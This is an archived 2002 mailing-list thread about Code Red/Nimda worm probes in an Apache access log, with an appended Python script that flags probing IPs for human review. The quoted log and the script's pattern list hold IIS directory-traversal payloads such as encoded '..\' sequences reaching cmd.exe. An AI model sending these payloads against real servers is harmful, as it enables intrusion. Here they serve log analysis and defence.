[Techtalk] outlook virii

Davis, Jennifer JDavis at JUSTICE.GC.CA
Mon Apr 15 10:06:21 EST 2002


Since most of the infections seem to be on similar IPs as mine
64.2XX.XXX.XXX and my ADSL is PPPoE, I could see accidentally banning my own
IP.

-----Original Message-----
From: jennyw [mailto:jennyw at dangerousideas.com]
Sent: 2002 Apr 13 1:44 AM
To: Techtalk at linuxchix.org
Subject: Re: [Techtalk] outlook virii


I wonder if there's a Web site that lists the IPs of all infected 
machines. That might be interesting ...

Jen

On Fri, Apr 12, 2002 at 10:43:26PM -0400, James wrote:
> I remember someone that made a Perl script which added offending IPs to
> a ipchains/iptables block list.
> 
> However, automated is BAD.  If this procedure caught on, virii writers
> might spoof IPs as a snub to those who do this.  Imagine if suddenly
> you've blackholed localhost or your gateway or your DNS servers or
> everything else in your Class C.
> 
> Basically, I just laugh at Nimda/CR trying to compromise my Apache
> server and weep because of all the people who are still
> vulnerable/infected.
> 
> - James
> 
> > -----Original Message-----
> > From: techtalk-admin at linuxchix.org
> [mailto:techtalk-admin at linuxchix.org]
> > On Behalf Of Davis, Jennifer
> > Sent: Friday, April 12, 2002 5:20 PM
> > To: 'Techtalk at linuxchix.org'
> > Subject: [Techtalk] outlook virii
> > 
> > Hi:
> > 
> > 	I was wondering if it was possible to send some sort of message back
> > to people (like maybe a popup message) when they hit my webserver that
> > surfing with viruses on their system is just not cool.  See an excerpt from
> > my log below.  I estimate that 95% of the hits to my web server are these
> > exploit attempts.  Barring that, is there a way to block an IP that we'll
> > say is looking for root.exe?  The webserver is a standard Apache 1.3?  that
> > came with Slackware 8.0.
> > 
> > Thanks again
> > Jenn
> > 
> > Jennifer Davis
> > Constitutional & Administrative Law - Droit administratif &
> > constitutionnel
> > Department of Justice Canada - Ministère de la Justice du Canada
> > *(613) 957-4963 - fx (613) 941-1937
> > *jdavis at justice.gc.ca
> > 
> > 64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP$
> > 64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> > 64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
> > 
> > 
> > 
> > 
> > _______________________________________________
> > Techtalk mailing list
> > Techtalk at linuxchix.org
> > http://mailman.linuxchix.org/mailman/listinfo/techtalk
> 
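The thread asks two things: how to spot the Code Red / Nimda probes (root.exe, cmd.exe and the encoded "..\" traversal forms shown in Jennifer's log) and how to avoid the trap James describes, where an automated blocker ends up blackholing localhost, the gateway or the resolvers because a source address was spoofed or was your own PPPoE address. The script below is an added example written for this page, not code from anyone on the list. It parses Apache common-log-format lines, tallies probe requests per source, excludes loopback, RFC1918, link-local and an operator-supplied list of "never block" addresses, and only reports candidates for a human to review rather than touching ipchains or iptables. The log lines, the gateway address 192.0.2.1 and the threshold of 3 are constructed for the demonstration.

```python
import ipaddress
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Request substrings characteristic of the IIS worm probes in the thread:
# root.exe, cmd.exe, and the double/overlong-encoded "..\" and "../" sequences.
PROBE_PATTERNS = (
    "root.exe", "cmd.exe",
    "..%255c", "..%c1%1c", "..%c0%2f", "..%c0%af", "..%c1%9c",
    "..%%35%63", "..%%35c", "..%25%35%63", "..%252f",
)

# Ranges that must never be blocked regardless of what the log says.
ALWAYS_PROTECTED = (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "169.254.0.0/16",
)


def parse_line(line):
    """Return the fields of a common-log-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_probe(request):
    """True if the request line carries one of the worm probe signatures."""
    lowered = request.lower()
    return any(p in lowered for p in PROBE_PATTERNS)


def build_never_block(own_addrs):
    """Protected networks: the fixed ranges plus the operator's own host,
    gateway and resolver addresses (a bare address becomes a /32)."""
    nets = [ipaddress.ip_network(n) for n in ALWAYS_PROTECTED]
    nets += [ipaddress.ip_network(a) for a in own_addrs]
    return nets


def is_protected(host, never_block):
    """True if host must not be acted on (protected range, or not an IP at all)."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True  # resolved hostnames or garbage: never act on those
    return any(addr in n for n in never_block)


def probe_candidates(lines, own_addrs=(), threshold=3):
    """Tally probe requests per source IP.
    Returns (candidates, skipped): sources at or above threshold that are safe
    to consider blocking, and protected sources that probed but were ignored."""
    counts, skipped = Counter(), Counter()
    never_block = build_never_block(own_addrs)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_probe(rec["request"]):
            continue
        if is_protected(rec["host"], never_block):
            skipped[rec["host"]] += 1
        else:
            counts[rec["host"]] += 1
    candidates = {h: c for h, c in counts.items() if c >= threshold}
    return candidates, dict(skipped)


# Constructed sample log: one scanner, one probe apparently from loopback,
# one apparently from the (hypothetical) gateway, and a mostly benign visitor.
SAMPLE_LOG = [
    '64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1601',
    '64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601',
    '64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601',
    '127.0.0.1 - - [10/Apr/2002:17:12:00 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1601',
    '192.0.2.1 - - [10/Apr/2002:17:12:01 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1601',
    '198.51.100.7 - - [10/Apr/2002:17:13:00 -0400] "GET /index.html HTTP/1.0" 200 2048',
    '198.51.100.7 - - [10/Apr/2002:17:13:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601',
]

if __name__ == "__main__":
    # own_addrs is the operator's own address, gateway and resolvers (hypothetical here).
    cands, ignored = probe_candidates(SAMPLE_LOG, own_addrs=("192.0.2.1",))
    for host, n in sorted(cands.items()):
        print(f"candidate for review: {host} ({n} probes)")
    for host, n in sorted(ignored.items()):
        print(f"protected, not acted on: {host} ({n} probes)")
```

Feeding a real access_log through `probe_candidates` gives a review list, which is the point: the threshold and the protected list absorb the one-off and spoofed entries James warns about, and the decision to add a firewall rule stays with the administrator instead of a cron job.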